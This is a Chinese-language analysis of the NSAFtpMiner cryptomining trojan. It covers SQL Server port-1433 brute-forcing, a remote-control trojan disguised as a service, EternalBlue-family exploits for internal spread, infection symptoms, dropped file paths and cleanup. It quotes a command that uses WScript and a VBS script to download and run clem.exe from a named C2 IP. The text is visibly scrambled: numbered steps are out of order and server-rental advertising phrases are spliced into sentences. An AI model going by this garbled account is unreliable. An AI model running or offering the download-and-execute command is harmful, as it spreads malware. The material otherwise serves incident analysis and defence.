NSAFtpMiner攻擊流程

1，cpu跑到100%，服務(wù)器非常卡，基本操作不了，所有提供服務(wù)無法正常運行。

3，斷網(wǎng)情況下無法挖礦，CPU占用回下來。

C:WindowsFontssystem(x64)

中毒表現(xiàn)：

使用kill.bat、Pkill.dll對攻擊進(jìn)程進(jìn)行清除。

1.利用密碼字典爆破1433端口登錄；

黑客攻擊時先關(guān)閉防火墻，然后啟動Fileftp.exe掃描內(nèi)網(wǎng)機器的445/139端口，如果端口處于打開狀態(tài)則利用多個NSA武器工具（Eternalblue等）對目標(biāo)機器進(jìn)行攻擊。若攻擊成功，則根據(jù)不同系統(tǒng)版本在受害機器上執(zhí)行payload(x86/x64.dll),x86/x64.dll執(zhí)行后釋放出runsum.exe并安裝執(zhí)行，runsum.exe功能同最初的遠(yuǎn)程控制模塊clem.exe相同，接收指令下載挖礦模塊和NSA攻擊模塊進(jìn)行挖礦攻擊和繼續(xù)感染。

clem.exe運行后拷貝自身到C:windowssvchost.exe，并創(chuàng)建服務(wù)“Server Remote”。

6.下載挖礦程序在局域網(wǎng)組網(wǎng)挖取門羅幣。

“C:WindowsSystem32WScript.exe” “C:ProgramDataget.vbs” hxxp://221.229.204.120:7423/clem.exe C:/ProgramData/clem.exe
連接C2地址221.229.204.120：

遠(yuǎn)程控制木馬clem.exe接收指令下載NSA攻擊模塊主程序ru.exe，香港服務(wù)器租用，ru.exe運行后在C:Program FilesWindowsd 釋放72個子文件。

C:WindowsHelp

原理：黑客通過1433端口爆破入侵SQL Server服務(wù)器，再植入遠(yuǎn)程控制木馬并安裝為系統(tǒng)服務(wù)，然后利用遠(yuǎn)程控制木馬進(jìn)一步加載挖礦木馬進(jìn)行挖礦。

1433爆破手礦工（NSAFtpMiner）有如下特點：

遠(yuǎn)程控制木馬clem.exe下載挖礦模塊xxs.exe，xxs.exe運行后釋放help.dll到C:WindowsFontssysIntl。

C:WindowsFontssystem(x86)

4.使用了NSA武器中的多個工具包Eternalblue(永恒之藍(lán))、Doubleplsar(雙脈沖星)、EternalChampion(永恒冠軍)、Eternalromance（永恒浪漫）、Esteemaudit（RDP漏洞攻擊）；

C:Windwosdell

5.遠(yuǎn)程控制木馬創(chuàng)建“FTP系統(tǒng)核心服務(wù)”，提供FTP服務(wù)，供內(nèi)網(wǎng)其他被入侵的電腦進(jìn)行病毒庫更新；

3.利用NSA武器庫工具包掃描入侵內(nèi)網(wǎng)開放445/139端口的計算機；

2，進(jìn)程中有win1ogins.exe,中間是數(shù)字1 不是字母l.描述是cpu挖礦。右鍵無法打開文件位置。

C:WindowsPLAsystem

黑客針對1433端口爆破成功后在受害機器執(zhí)行命令：

2.木馬偽裝成系統(tǒng)服務(wù)，歐洲服務(wù)器租用 云服務(wù)器，COPY自身到c:windowssvchost.exe，創(chuàng)建服務(wù)“Server Remote”；

使用360掃描殺毒，可以發(fā)現(xiàn)釋放文件help.dll

help.dll釋放礦機程序win1ogins.exe到以下目錄：